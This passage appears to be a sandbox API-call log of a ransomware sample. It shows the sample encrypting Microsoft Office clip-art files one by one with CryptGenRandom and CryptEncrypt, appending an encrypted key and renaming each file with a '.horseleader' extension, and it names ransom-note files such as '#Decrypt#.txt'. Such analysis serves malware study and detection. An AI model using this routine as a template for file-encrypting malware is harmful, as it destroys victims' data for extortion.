lstrcmpiW (lpString1="AN01174_.WMF", lpString2="Windows") returned -1 [0252.744] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 67 [0252.745] StrStrIW (lpFirst="AN01174_.WMF", lpSrch=".horseleader") returned 0x0 [0252.745] lstrcmpW (lpString1="AN01174_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.745] lstrcmpW (lpString1="AN01174_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.745] lstrlenW (lpString=".testttjffg") returned 11 [0252.745] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.745] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.745] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.745] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.746] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF") returned 67 [0252.746] StrStrW (lpFirst="AN01174_.WMF", lpSrch=".txt") returned 0x0 [0252.746] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=27858) returned 1 [0252.746] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.749] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.750] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0252.750] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1cd2, lpOverlapped=0x0) returned 1 [0252.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe32e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.750] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1cd2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1cd2, lpOverlapped=0x0) returned 1 [0252.750] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.750] WriteFile (in: 
hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.751] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.751] CloseHandle (hObject=0x158) returned 1 [0252.751] GetProcessHeap () returned 0x780000 [0252.751] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.751] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.horseleader") returned 79 [0252.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01174_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01174_.wmf.horseleader")) returned 1 [0252.752] GetProcessHeap () returned 0x780000 [0252.752] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.752] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbf4f00, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8cbf4f00, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xea2, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01184_.WMF", cAlternateFileName="")) returned 1 [0252.752] lstrcmpiW (lpString1="AN01184_.WMF", lpString2="Windows") returned -1 
[0252.752] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 67 [0252.752] StrStrIW (lpFirst="AN01184_.WMF", lpSrch=".horseleader") returned 0x0 [0252.752] lstrcmpW (lpString1="AN01184_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.753] lstrcmpW (lpString1="AN01184_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.753] lstrlenW (lpString=".testttjffg") returned 11 [0252.753] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.753] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.753] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.753] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.754] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 67 [0252.754] StrStrW (lpFirst="AN01184_.WMF", lpSrch=".txt") returned 0x0 [0252.754] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3746) returned 1 [0252.754] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xea2, lpOverlapped=0x0) returned 1 [0252.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff15e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0252.756] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xea2, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xea2, lpOverlapped=0x0) returned 1 [0252.756] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.756] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.757] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.757] CloseHandle (hObject=0x158) returned 1 [0252.757] GetProcessHeap () returned 0x780000 [0252.757] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.757] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.horseleader") returned 79 [0252.757] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.horseleader")) returned 1 [0252.758] GetProcessHeap () returned 0x780000 [0252.758] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.758] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x8335e700, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x8335e700, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0x16cc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01216_.WMF", cAlternateFileName="")) returned 1 [0252.758] lstrcmpiW (lpString1="AN01216_.WMF", lpString2="Windows") returned -1 [0252.759] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 67 [0252.759] StrStrIW (lpFirst="AN01216_.WMF", lpSrch=".horseleader") returned 0x0 [0252.759] lstrcmpW (lpString1="AN01216_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.759] lstrcmpW (lpString1="AN01216_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.759] lstrlenW (lpString=".testttjffg") returned 11 [0252.759] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.759] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.759] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.759] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.760] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 67 [0252.760] StrStrW (lpFirst="AN01216_.WMF", lpSrch=".txt") returned 0x0 [0252.760] 
GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5836) returned 1 [0252.760] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x16cc, lpOverlapped=0x0) returned 1 [0252.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe934, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.765] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x16cc, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x16cc, lpOverlapped=0x0) returned 1 [0252.765] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.765] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.766] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.766] CloseHandle (hObject=0x158) returned 1 [0252.766] GetProcessHeap () returned 0x780000 [0252.766] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.766] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.horseleader") returned 79 [0252.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft 
Office\\CLIPART\\PUB60COR\\AN01216_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.horseleader")) returned 1 [0252.768] GetProcessHeap () returned 0x780000 [0252.768] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.768] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7fa26000, ftCreationTime.dwHighDateTime=0x1bd4af6, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7fa26000, ftLastWriteTime.dwHighDateTime=0x1bd4af6, nFileSizeHigh=0x0, nFileSizeLow=0xbc4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01218_.WMF", cAlternateFileName="")) returned 1 [0252.768] lstrcmpiW (lpString1="AN01218_.WMF", lpString2="Windows") returned -1 [0252.768] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 67 [0252.768] StrStrIW (lpFirst="AN01218_.WMF", lpSrch=".horseleader") returned 0x0 [0252.768] lstrcmpW (lpString1="AN01218_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.768] lstrcmpW (lpString1="AN01218_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.769] lstrlenW (lpString=".testttjffg") returned 11 [0252.769] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.769] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.769] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.769] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" 
(normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.770] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 67 [0252.770] StrStrW (lpFirst="AN01218_.WMF", lpSrch=".txt") returned 0x0 [0252.770] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=3012) returned 1 [0252.770] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xbc4, lpOverlapped=0x0) returned 1 [0252.773] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff43c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.773] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xbc4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xbc4, lpOverlapped=0x0) returned 1 [0252.774] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.774] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0252.774] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.774] CloseHandle (hObject=0x158) returned 1 [0252.774] GetProcessHeap () returned 0x780000 [0252.774] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.774] 
wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.horseleader") returned 79 [0252.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.horseleader")) returned 1 [0252.776] GetProcessHeap () returned 0x780000 [0252.776] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.776] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68bb3800, ftCreationTime.dwHighDateTime=0x1bd4b0d, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x68bb3800, ftLastWriteTime.dwHighDateTime=0x1bd4b0d, nFileSizeHigh=0x0, nFileSizeLow=0xac4, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01251_.WMF", cAlternateFileName="")) returned 1 [0252.776] lstrcmpiW (lpString1="AN01251_.WMF", lpString2="Windows") returned -1 [0252.776] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 67 [0252.776] StrStrIW (lpFirst="AN01251_.WMF", lpSrch=".horseleader") returned 0x0 [0252.776] lstrcmpW (lpString1="AN01251_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.776] lstrcmpW (lpString1="AN01251_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.776] lstrlenW (lpString=".testttjffg") returned 11 [0252.776] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF", lpSrch=".testttjffg") returned 0x0 
[0252.776] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.776] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.778] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 67 [0252.778] StrStrW (lpFirst="AN01251_.WMF", lpSrch=".txt") returned 0x0 [0252.778] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2756) returned 1 [0252.778] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0xac4, lpOverlapped=0x0) returned 1 [0252.780] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffff53c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0252.780] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0xac4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0xac4, lpOverlapped=0x0) returned 1 [0252.780] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0252.780] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 
[0252.781] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0252.781] CloseHandle (hObject=0x158) returned 1 [0252.781] GetProcessHeap () returned 0x780000 [0252.781] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0252.781] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.horseleader") returned 79 [0252.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.horseleader" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.horseleader")) returned 1 [0252.782] GetProcessHeap () returned 0x780000 [0252.783] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0252.783] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc436f700, ftCreationTime.dwHighDateTime=0x1bd4b08, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc436f700, ftLastWriteTime.dwHighDateTime=0x1bd4b08, nFileSizeHigh=0x0, nFileSizeLow=0x1ccc, dwReserved0=0x7e1110, dwReserved1=0xd3dda4fd, cFileName="AN01545_.WMF", cAlternateFileName="")) returned 1 [0252.783] lstrcmpiW (lpString1="AN01545_.WMF", lpString2="Windows") returned -1 [0252.783] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 67 [0252.783] StrStrIW 
(lpFirst="AN01545_.WMF", lpSrch=".horseleader") returned 0x0 [0252.783] lstrcmpW (lpString1="AN01545_.WMF", lpString2="#Decrypt#.txt") returned 1 [0252.783] lstrcmpW (lpString1="AN01545_.WMF", lpString2="_uninstalling_.png") returned 1 [0252.783] lstrlenW (lpString=".testttjffg") returned 11 [0252.783] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF", lpSrch=".testttjffg") returned 0x0 [0252.783] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0252.783] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0252.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01545_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0252.784] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01545_.WMF") returned 67 [0252.784] StrStrW (lpFirst="AN01545_.WMF", lpSrch=".txt") returned 0x0 [0252.784] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=7372) returned 1 [0252.784] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 